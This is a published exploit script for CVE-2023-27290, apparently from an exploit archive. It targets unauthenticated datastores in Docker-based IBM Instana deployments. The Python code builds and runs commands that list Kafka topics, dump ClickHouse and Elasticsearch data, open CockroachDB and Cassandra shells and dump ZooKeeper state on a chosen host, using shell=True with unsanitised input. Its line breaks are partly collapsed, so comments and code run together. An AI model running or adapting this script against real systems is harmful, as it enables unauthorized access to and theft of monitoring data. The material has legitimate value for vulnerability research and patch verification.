# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication # Google Dork: [if applicable]# Date: 06 March 2023# Exploit Author: Shahid Parvez (zippon)# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)# Tested on: [Mac os]# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect
# Define the available options and their corresponding commands
COMMANDS = {"kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal","cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'","clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',"cockroach": "cockroach sql --host {host}:{port} --insecure","zookeeper": "echo dump |ncat {host} {port}","node-export": "curl http://{host}:{port}","elasticsearch": "curl http://{host}:{port}/_cat/indices?v","prometheus": "curl http://{host}:{port}/metrics","clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'}# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port",type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")# Parse the command-line arguments
args = parser.parse_args()# Determine the port number to useif args.port is None:
if args.option == "cassandra":
port = "9042"
elif args.option == "clickhouse":
port = "8123"
elif args.option == "cockroach":
port = "26257"
elif args.option == "elasticsearch":
port = "9200"
elif args.option == "kafka":
port = "9092"
elif args.option == "node-export":
port = "8181"
elif args.option == "prometheus":
port = "9090"
elif args.option == "zookeeper":
port = "2181"else:
port = str(args.port)# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)# Print the command line if verbose option is providedif args.verbose:
print(f"Executing command: {command}")# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shellif args.option == "cassandra":
child = pexpect.spawn(command)
child.expect("Connected to.*", timeout=10)
child.interact()
output = child.before
elif args.option == "cockroach":
child = pexpect.spawn(command)
child.expect("root@.*:", timeout=10)
child.interact()
output = child.before
# If any other option is selected, execute the command and capture the outputelse:
output = subprocess.check_output(command, shell=True)# If an output file is provided, write the output to the fileif args.output:
with open(args.output,"wb") as f:
f.write(output)# Print the output to the console
print(output.decode())
